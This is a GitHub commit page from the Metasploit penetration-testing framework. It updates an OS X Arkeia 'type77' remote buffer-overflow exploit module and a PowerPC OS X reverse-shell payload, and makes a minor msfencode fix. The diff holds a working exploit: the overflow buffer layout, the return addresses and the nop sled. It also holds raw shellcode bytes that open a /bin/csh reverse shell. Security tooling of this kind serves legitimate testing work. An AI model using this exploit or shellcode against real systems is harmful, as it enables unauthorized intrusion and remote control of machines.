Permalink
Browse files

Bug fix to msfencode when invalid -e is specified

Small tweaks to type77, mostly for print_status and -find
Fixed busted payload port in shell_reverse_tcp


git-svn-id: file:///home/svn/incoming/trunk@3469 4d416f70-5f16-0410-b530-b9f4589650da
  • Loading branch information...
1 parent e01b5ae commit 04341837f75c6c6cf8f96730260aa1128a2730dd HD Moore committed Jan 29, 2006
Showing with 21 additions and 13 deletions.
  1. +7 −2 modules/exploits/osx/arkeia/type77.rb
  2. +13 −11 modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb
  3. +1 −0 msfencode
@@ -33,6 +33,10 @@ def initialize(info = {})
'Space' => 1000,
'BadChars' => "\x00",
'MinNops' => 700,
+ 'Compat' =>
+ {
+ 'ConnectionType' => '-find',
+ },
},
'Targets' =>
[
@@ -81,16 +85,17 @@ def exploit
# getenv() before our function returns.
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
+ head[6, 2] = [1200].pack('n')
+
buf = Rex::Text.rand_text_english(1200, payload_badchars)
# Return back to the stack either directly or via system lib
buf[0, 112] = [target.ret].pack('N') * (112/4)
# Huge nop slep followed by the payload
buf[112, payload.encoded.length] = payload.encoded
-
- head[6, 2] = [buf.length].pack('n')
+ print_status("Sending request...")
begin
sock.put(head)
sock.put(buf)
@@ -30,17 +30,19 @@ def initialize(info = {})
'LPORT' => [ 34, 'n' ],
'LHOST' => [ 36, 'ADDR' ],
},
- 'Payload' =>
- "\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00\x61" +
- "\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00\x00\x0d" +
- "\x00\x02\x10\xe1\x7c\x88\x02\xa6\x38\xa0\x00\x10\x38\x00\x00\x62" +
- "\x7f\xc3\xf3\x78\x44\x00\x00\x02\x7c\x00\x02\x78\x38\xa0\x00\x02" +
- "\x38\x00\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78\x44\x00\x00\x02" +
- "\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff\x40\x82\xff\xe5" +
- "\x38\x00\x00\x42\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\xa5\x2a\x79" +
- "\x40\x82\xff\xfd\x7c\x68\x02\xa6\x38\x63\x00\x20\x90\x61\xff\xf8" +
- "\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x00\x00\x3b\x7c\x00\x04\xac" +
- "\x44\x00\x00\x02\x2f\x62\x69\x6e\x2f\x63\x73\x68\x00\x41\x41\x41"
+ 'Payload' =>
+ "\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00" +
+ "\x00\x61\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78" +
+ "\x48\x00\x00\x0d\x00\x02\x22\x11\x7f\x00\x00\x01\x7c\x88" +
+ "\x02\xa6\x38\xa0\x00\x10\x38\x00\x00\x62\x7f\xc3\xf3\x78" +
+ "\x44\x00\x00\x02\x7c\x00\x02\x78\x38\xa0\x00\x02\x38\x00" +
+ "\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78\x44\x00\x00\x02" +
+ "\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff\x40\x82" +
+ "\xff\xe5\x38\x00\x00\x42\x44\x00\x00\x02\x7c\x00\x02\x78" +
+ "\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7c\x68\x02\xa6\x38\x63" +
+ "\x00\x20\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8" +
+ "\x38\x00\x00\x3b\x7c\x00\x04\xac\x44\x00\x00\x02\x2f\x62" +
+ "\x69\x6e\x2f\x63\x73\x68\x00\x41\x41\x41"
}
))
end
View
@@ -141,6 +141,7 @@ case cmd
buf = input.readlines.join
encoders.each { |enc|
+ next if not enc
begin
# Imports options
enc.datastore.import_options_from_s(options)

0 comments on commit 0434183

Please sign in to comment.